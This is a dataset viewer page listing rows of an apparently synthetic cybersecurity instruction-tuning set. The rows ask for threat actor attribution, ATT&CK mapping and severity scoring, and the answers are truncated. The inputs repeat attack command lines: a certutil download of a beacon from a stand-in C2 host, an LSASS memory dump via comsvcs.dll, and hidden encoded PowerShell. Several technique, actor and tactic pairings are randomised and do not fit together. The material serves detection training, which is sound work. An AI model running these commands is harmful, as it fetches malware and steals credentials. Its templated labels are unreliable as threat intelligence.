messages listlengths 2 2 |
|---|
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1546.003 - Event Triggered Execution: WMI Event Subscription\nEvasion Methods: Base64, TLS, Fileless\nProcess: cmstp.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be.... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1021.006 using fileless technique.\nProcess: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2946 C:\\temp\\lsass.dmp full\nData Source: PowerShell... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1546.003\nTarget System: Windows 11 system (WIN-FIN-SRV-REPGBEGHIQ)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"con... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1021.006\nTarget System: Windows Server 2022 system (AZURE-VM-R6TRV8BUFU)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"conte... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1098.004 - SSH Authorized Keys\nEvasion Methods: TLS, JA3 Spoof, Base64\nProcess: certutil.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...",
"role": "user"
... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1566.001 using LOLBin technique.\nProcess: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nData Source: Azure A... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1021.006 using cloud-native technique.\nProcess: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source:... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1531 using encrypted C2 technique.\nProcess: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nData Source: Windows Securit... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1071.001 - Web Protocols (HTTPS C2)\nEvasion Methods: Base64, JA3 Spoof, WMI\nProcess: wmic.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFM...",
"role": "user"
... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Lapsus$] performed T1531 using fileless technique.\nProcess: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3166 C:\\temp\\lsass.dmp full\nData Source: CloudTrail (D... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1570 using fileless technique.\nProcess: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2064 C:\\temp\\lsass.dmp full\nData Source: Azure AD Sign-i... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1021.006 using fileless technique.\nProcess: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1484.001 - Domain Policy Modification: Group Policy Modification\nEvasion Methods: LOLBin, JA3 Spoof, TLS\nProcess: mshta.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc UQBvAHcAZQB... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1021.006 using cloud-native technique.\nProcess: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3936 C:\\temp\\lsass.dmp full\nData Source:... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1566.001 using encrypted C2 technique.\nProcess: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1059.001\nTarget System: Ubuntu 22.04 system (DB-ORACLE-6Z432GBWUW)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Collection, Execution, Defense Evasion",
"role": "user... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1003.001\nTarget System: Windows Server 2022 system (AZURE-VM-M253TRT56X)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1098.004 - SSH Authorized Keys\nEvasion Methods: TLS, Fileless, LOLBin\nProcess: rundll32.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...",
"role": "user"
}... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1098.004\nTarget System: Amazon Linux 2 system (APP-WEB-ZVIN01KG9M)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"co... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1098.004 - SSH Authorized Keys\nEvasion Methods: LOLBin, Base64, TLS\nProcess: certutil.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc JABkACAALQBlAH....",
"role": "user"
},
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1059.001 - PowerShell\nEvasion Methods: Fileless, Base64, LOLBin\nProcess: bitsadmin.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 2241 C:\\temp\\ls...",
"role": "user"
},
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1570 - Lateral Tool Transfer\nEvasion Methods: Fileless, WMI, Base64\nProcess: mshta.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc JABkACAALQBlAH....",
"role": "user"
},
{... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1071.001\nTarget System: Windows Server 2022 system (IAM-ROLE-KH63HUJZ6U)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Impact",
"role": "user"
},... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1566.001\nTarget System: Windows Server 2022 system (IAM-ROLE-0NDOW5LK64)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"con... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Lapsus$] performed T1098.004 using cloud-native technique.\nProcess: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Cloud... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1021.006 using LOLBin technique.\nProcess: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Powe... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1531 - Cloud Service Hijack / Account Access Removal\nEvasion Methods: WMI, LOLBin, Base64\nProcess: rundll32.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 878 C:\\temp\\lsa...",
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1098.004\nTarget System: Windows Server 2022 system (APP-WEB-JM2X33GGJ9)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Persistence",
"role": "user"
},... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1570 - Lateral Tool Transfer\nEvasion Methods: WMI, Base64, JA3 Spoof\nProcess: certutil.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...",
"role": "user"
},... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1484.001 - Domain Policy Modification: Group Policy Modification\nEvasion Methods: LOLBin, JA3 Spoof, Base64\nProcess: powershell.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 541... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1003.001\nTarget System: Windows Server 2022 system (IAM-ROLE-ZF28CMBM7G)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1003.001\nTarget System: Amazon Linux 2 system (IAM-ROLE-3WO1MCO3WR)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Discovery, Collection",
"role": "user"
},
{... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1071.001 - Web Protocols (HTTPS C2)\nEvasion Methods: WMI, Fileless, JA3 Spoof\nProcess: rundll32.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc JABkACAALQBlAH....",
"role": "u... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1570 - Lateral Tool Transfer\nEvasion Methods: TLS, Fileless, LOLBin\nProcess: bitsadmin.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...",
"role": "user"
},... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1566.001\nTarget System: Ubuntu 22.04 system (AZURE-VM-ACRE4XTPZF)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1071.001 - Web Protocols (HTTPS C2)\nEvasion Methods: TLS, Base64, WMI\nProcess: bitsadmin.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFM...",
"role": "user"
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1546.003\nTarget System: Ubuntu 22.04 system (AZURE-VM-0QJG7VMW3T)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "Seve... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1021.006\nTarget System: Amazon Linux 2 system (APP-WEB-U7BTVMNBYK)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Discovery, Command and Control",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1546.003 - Event Triggered Execution: WMI Event Subscription\nEvasion Methods: WMI, TLS, JA3 Spoof\nProcess: wmic.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be..."... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1570 - Lateral Tool Transfer\nEvasion Methods: JA3 Spoof, LOLBin, TLS\nProcess: powershell.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 2948 C:\\temp\\ls...",
"role": "user"
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1566.001\nTarget System: Windows 11 system (DB-ORACLE-IZJLC1A266)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Persistence, Impact",
"role": "user"
},
{
"co... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1071.001 - Web Protocols (HTTPS C2)\nEvasion Methods: TLS, Fileless, JA3 Spoof\nProcess: powershell.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc JABkACAALQBlAH....",
"role": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1071.001\nTarget System: Windows 11 system (APP-WEB-CU7QQTG0QQ)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Defense Evasion, Impact",
"role": "user"
},
{
"cont... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1071.001\nTarget System: Ubuntu 22.04 system (AZURE-VM-478NU4943K)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Persistence, Discovery",
"role": "user"
},
... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1021.006 using cloud-native technique.\nProcess: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2742 C:\\temp\\lsass.dmp full\nData Source: Wind... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1566.001\nTarget System: Amazon Linux 2 system (IAM-ROLE-ELZ72XTET6)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1484.001 - Domain Policy Modification: Group Policy Modification\nEvasion Methods: Base64, JA3 Spoof, Fileless\nProcess: cmstp.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc aWV4IC... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1531\nTarget System: Amazon Linux 2 system (DB-ORACLE-FZ9WN8HD34)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Discovery, Impact",
"role": "us... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1021.006 - Windows Remote Management\nEvasion Methods: WMI, Fileless, LOLBin\nProcess: cmstp.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...",
"role": "user"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1566.001 - Phishing: Spearphishing Attachment\nEvasion Methods: JA3 Spoof, LOLBin, TLS\nProcess: rundll32.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...",
"r... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1546.003\nTarget System: Amazon Linux 2 system (APP-WEB-R5GXXY3AKY)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Collection, Initial Access",
"role": "us... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1098.004 - SSH Authorized Keys\nEvasion Methods: JA3 Spoof, Base64, LOLBin\nProcess: rundll32.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...",
"role": "user"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1531\nTarget System: Windows Server 2022 system (IAM-ROLE-O2AG4BOQUW)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Execution",
"role": "user"
},
{
"co... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1003.001 - OS Credential Dumping: LSASS Memory\nEvasion Methods: Base64, Fileless, LOLBin\nProcess: bitsadmin.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...",
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1484.001\nTarget System: Amazon Linux 2 system (AZURE-VM-YR0T4NNKT0)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Collection, Command and Control",
... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT41] performed T1531 using cloud-native technique.\nProcess: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nData Source: PowerS... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1546.003\nTarget System: Windows Server 2022 system (EC2-INST-7785N3MEVM)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1484.001 using LOLBin technique.\nProcess: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nData Source: Sysmon (DS0024)",
"rol... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1570 - Lateral Tool Transfer\nEvasion Methods: LOLBin, Fileless, WMI\nProcess: wmic.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFM...",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1531\nTarget System: Ubuntu 22.04 system (AZURE-VM-DDEM6KXEB1)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "Severi... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Mustang Panda] performed T1546.003 using fileless technique.\nProcess: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2775 C:\\temp\\lsass.dmp full\nData Source: Clou... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT41] performed T1059.001 using LOLBin technique.\nProcess: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 661 C:\\temp\\lsass.dmp full\nData Source: Sysmon (DS0024)",
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1531 - Cloud Service Hijack / Account Access Removal\nEvasion Methods: Fileless, JA3 Spoof, LOLBin\nProcess: wmic.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFM..."... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1531 using cloud-native technique.\nProcess: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 873 C:\\temp\\lsass.dmp full\nData Source: PowerShell Lo... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1531 using fileless technique.\nProcess: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: PowerShell Logg... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1021.006 - Windows Remote Management\nEvasion Methods: Fileless, TLS, LOLBin\nProcess: powershell.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFM...",
"role": "u... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Lapsus$] performed T1546.003 using encrypted C2 technique.\nProcess: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: W... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1071.001\nTarget System: Windows 11 system (EC2-INST-CNCF6Y7AQV)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"co... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1570\nTarget System: Ubuntu 22.04 system (WIN-FIN-SRV-GOWWJGHERP)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Command and Control, Credential Access",
"role": "user"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1546.003\nTarget System: Windows Server 2022 system (AZURE-VM-92ITZ9414Q)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1059.001\nTarget System: Ubuntu 22.04 system (EC2-INST-QE6UWY2U6N)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Impact, Collection",
"role": "user"
},
{
"c... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Volt Typhoon] performed T1570 using LOLBin technique.\nProcess: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: PowerS... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT41] performed T1570 using LOLBin technique.\nProcess: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nData Source: Network Connectio... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1003.001\nTarget System: Windows 11 system (EC2-INST-0BQ19NNSY7)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Defense Evasion",
"role": "user"
}... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1546.003\nTarget System: Windows Server 2022 system (APP-WEB-2NMGB18QCH)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Defense Evasion, Execution",
"ro... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1071.001 using encrypted C2 technique.\nProcess: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3009 C:\\temp\\lsass.dmp full\nData Source: Azure ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1566.001 - Phishing: Spearphishing Attachment\nEvasion Methods: WMI, Fileless, JA3 Spoof\nProcess: rundll32.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...",
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1071.001\nTarget System: Amazon Linux 2 system (DB-ORACLE-4BKXDQOY20)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Collection, Persistence",
"role... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1059.001\nTarget System: Windows 11 system (DB-ORACLE-HW7L1R04FI)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Initial Access, Credential Access, Privilege Escalation",
"r... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1059.001 using cloud-native technique.\nProcess: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 644 C:\\temp\\lsass.dmp full\nData Source: Sysmon ... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1021.006 using LOLBin technique.\nProcess: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Network ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1098.004 - SSH Authorized Keys\nEvasion Methods: WMI, JA3 Spoof, LOLBin\nProcess: wmic.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc JABkACAALQBlAH....",
"role": "user"
},
... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Volt Typhoon] performed T1484.001 using cloud-native technique.\nProcess: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nData S... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [Scattered Spider] performed T1546.003 using encrypted C2 technique.\nProcess: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nData So... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1021.006 - Windows Remote Management\nEvasion Methods: TLS, Fileless, LOLBin\nProcess: rundll32.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...",
"role": "use... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [UNC4841] performed T1484.001 using LOLBin technique.\nProcess: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1733 C:\\temp\\lsass.dmp full\nData Source: Network Connect... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1570\nTarget System: Windows Server 2022 system (EC2-INST-MTI6RAAJDL)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"conte... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1059.001 - PowerShell\nEvasion Methods: Base64, Fileless, WMI\nProcess: powershell.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 3887 C:\\temp\\ls...",
"role": "user"
},
{... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1546.003 using encrypted C2 technique.\nProcess: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nData Source: Azure ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1059.001 - PowerShell\nEvasion Methods: Base64, WMI, Fileless\nProcess: powershell.exe\nCommand Pattern: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFM...",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [APT29] performed T1003.001 using encrypted C2 technique.\nProcess: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nData Source: CloudTrail (DS0028)... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1531 - Cloud Service Hijack / Account Access Removal\nEvasion Methods: Base64, TLS, Fileless\nProcess: bitsadmin.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...",... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1566.001\nTarget System: Windows 11 system (WIN-FIN-SRV-ENVQ49BY0H)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Credential Access, Privilege Escalation"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1566.001\nTarget System: Ubuntu 22.04 system (IAM-ROLE-D97ROV2Q0A)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "Seve... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Technique: T1059.001\nTarget System: Windows Server 2022 system (IAM-ROLE-WJIZNJDXSA)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Credential Access, Impact",
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1021.006 - Windows Remote Management\nEvasion Methods: TLS, Fileless, LOLBin\nProcess: bitsadmin.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 1389 C:\\temp\\ls...",
"role": "... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1021.006 - Windows Remote Management\nEvasion Methods: TLS, JA3 Spoof, WMI\nProcess: powershell.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 2653 C:\\temp\\ls...",
"role": "u... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1566.001 - Phishing: Spearphishing Attachment\nEvasion Methods: WMI, LOLBin, Fileless\nProcess: certutil.exe\nCommand Pattern: rundll32.exe comsvcs.dll, MiniDump 3080 C:\\temp\\ls...",
"... |
[
{
"content": "Instruction: Extract the MITRE ATT&CK tactics and techniques from the following security event.\n\nInput: Description: [FIN7] performed T1003.001 using fileless technique.\nProcess: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nData Source: PowerSh... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Technique: T1003.001 - OS Credential Dumping: LSASS Memory\nEvasion Methods: Fileless, JA3 Spoof, LOLBin\nProcess: mshta.exe\nCommand Pattern: certutil.exe -urlcache -split -f https://mal.c2/be...",
... |
End of preview. Expand
in Data Studio
README.md exists but content is empty.
- Downloads last month
- 33